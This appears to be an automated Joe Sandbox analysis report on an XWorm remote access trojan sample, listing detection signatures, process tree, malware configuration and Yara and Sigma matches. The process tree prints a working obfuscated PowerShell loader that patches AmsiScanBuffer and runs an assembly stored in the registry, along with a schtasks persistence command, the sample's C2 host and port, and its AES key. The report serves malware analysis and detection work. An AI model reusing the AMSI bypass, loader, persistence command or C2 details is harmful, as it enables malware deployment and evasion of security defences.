Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
aoKTzGQSRP.exe

Overview

General Information

Sample name:aoKTzGQSRP.exe
renamed because original name is a hash value
Original sample name:202cb1021a1db9bd59a642ebee781bbafe284faf3fe1ba8e0ed1d89b3878ddbf.exe
Analysis ID:1539526
MD5:86357c1fffbe566da1d9903ab765f921
SHA1:1d55db2dd9e556ff066e297273e402130adf515f
SHA256:202cb1021a1db9bd59a642ebee781bbafe284faf3fe1ba8e0ed1d89b3878ddbf
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates a thread in another existing process (thread injection)
Drops PE files to the user root directory
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • aoKTzGQSRP.exe (PID: 5228 cmdline: "C:\Users\user\Desktop\aoKTzGQSRP.exe" MD5: 86357C1FFFBE566DA1D9903AB765F921)
    • CMaker 2.0.exe (PID: 4800 cmdline: "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe" MD5: CC32561980C2400C490A4849C78E38ED)
      • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • CMaker 2.0.exe (PID: 1136 cmdline: "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe" MD5: CC32561980C2400C490A4849C78E38ED)
    • 1.exe (PID: 4828 cmdline: "C:\Users\user\AppData\Local\Temp\1.exe" MD5: E1C82191B678CEA8F3C996887DDC1232)
      • DeadXClient.exe (PID: 6684 cmdline: "C:\Users\Public\DeadXClient.exe" MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
        • schtasks.exe (PID: 7000 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • DeadROOTkit.exe (PID: 4188 cmdline: "C:\Users\Public\DeadROOTkit.exe" MD5: 7DD98FC2976EE270A278E1A9A28EEFAE)
        • WerFault.exe (PID: 4976 cmdline: C:\Windows\system32\WerFault.exe -u -p 4188 -s 1660 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • DeadCodeRootKit.exe (PID: 6704 cmdline: "C:\Users\Public\DeadCodeRootKit.exe" MD5: B8479A23C22CF6FC456E197939284069)
  • powershell.exe (PID: 5000 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'d'+[Char](100)+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BQVbDmmpYciFvEPZCVf=PwejfaSCJJDP @([String])([IntPtr]);$EAvMyVuYpliIybTRzMjsOI=PwejfaSCJJDP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JZLeUIgnxFO=$mHgtxYLbOzoJe.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+''+'n'+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$yudsyoexNPPoGc=$mfOCIRUxBUWIVl.Invoke($Null,@([Object]$JZLeUIgnxFO,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'dL'+'i'+''+[Char](98)+''+'r'+''+'a'+'r'+'y'+''+[Char](65)+'')));$WIJhlFbJQceUyrYdX=$mfOCIRUxBUWIVl.Invoke($Null,@([Object]$JZLeUIgnxFO,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+'r'+'o'+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$SWLVYEp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yudsyoexNPPoGc,$BQVbDmmpYciFvEPZCVf).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$xjZyvNWKEgRcmEMjl=$mfOCIRUxBUWIVl.Invoke($Null,@([Object]$SWLVYEp,[Object]('Am'+[Char](115)+''+'i'+''+'S'+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$gRxCzystuh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WIJhlFbJQceUyrYdX,$EAvMyVuYpliIybTRzMjsOI).Invoke($xjZyvNWKEgRcmEMjl,[uint32]8,4,[ref]$gRxCzystuh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$xjZyvNWKEgRcmEMjl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WIJhlFbJQceUyrYdX,$EAvMyVuYpliIybTRzMjsOI).Invoke($xjZyvNWKEgRcmEMjl,[uint32]8,0x20,[ref]$gRxCzystuh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('Dead'+'s'+''+[Char](116)+''+[Char](97)+'ger')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 5644 cmdline: C:\Windows\System32\dllhost.exe /Processid:{ac6bab9f-cf5e-448a-be82-36c64370aff3} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 560 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 652 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 996 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 60 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 980 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1140 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1192 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1248 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1328 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1448 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1516 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1560 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1640 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1648 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1784 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • WMIADAP.exe (PID: 1804 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
  • svchost.exe (PID: 6288 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 1020 cmdline: C:\Windows\system32\WerFault.exe -pss -s 492 -p 4188 -ip 4188 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • Deadsvchost.exe (PID: 1804 cmdline: C:\Users\Public\Deadsvchost.exe MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
  • Deadsvchost.exe (PID: 1020 cmdline: "C:\Users\Public\Deadsvchost.exe" MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
  • Deadsvchost.exe (PID: 4152 cmdline: "C:\Users\Public\Deadsvchost.exe" MD5: F1976EA02BFFAEF5AC943C2ABBB7426C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["updates-full.gl.at.ply.gg"], "Port": "60075", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.0"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\DeadROOTkit.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\Public\DeadROOTkit.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\Public\DeadROOTkit.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        C:\Users\Public\DeadROOTkit.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x888a:$s6: VirtualBox
        • 0x87e8:$s8: Win32_ComputerSystem
        • 0x91f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x9293:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x93a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x8d52:$cnc4: POST / HTTP/1.1
        C:\Users\Public\Deadsvchost.exeJoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 3 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x7332:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x73cf:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x74e4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x716e:$cnc4: POST / HTTP/1.1
            00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x868a:$s6: VirtualBox
                • 0x85e8:$s8: Win32_ComputerSystem
                • 0x8ff6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x9093:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x91a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x8b52:$cnc4: POST / HTTP/1.1
                Click to see the 12 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                7.0.DeadROOTkit.exe.dd0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  7.0.DeadROOTkit.exe.dd0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    7.0.DeadROOTkit.exe.dd0000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                      7.0.DeadROOTkit.exe.dd0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0x888a:$s6: VirtualBox
                      • 0x87e8:$s8: Win32_ComputerSystem
                      • 0x91f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0x9293:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0x93a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0x8d52:$cnc4: POST / HTTP/1.1
                      4.2.1.exe.2ff5330.2.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        Click to see the 8 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Execution from Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\DeadXClient.exe" , CommandLine: "C:\Users\Public\DeadXClient.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\DeadXClient.exe, NewProcessName: C:\Users\Public\DeadXClient.exe, OriginalFileName: C:\Users\Public\DeadXClient.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1.exe, ParentProcessId: 4828, ParentProcessName: 1.exe, ProcessCommandLine: "C:\Users\Public\DeadXClient.exe" , ProcessId: 6684, ProcessName: DeadXClient.exe
                        Sigma detected: New RUN Key Pointing to Suspicious Folder
                        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Deadsvchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\DeadXClient.exe, ProcessId: 6684, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deadsvchost
                        Sigma detected: Potential PowerShell Command Line Obfuscation
                        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'d'+[
                        Sigma detected: Potential WinAPI Calls Via CommandLine
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 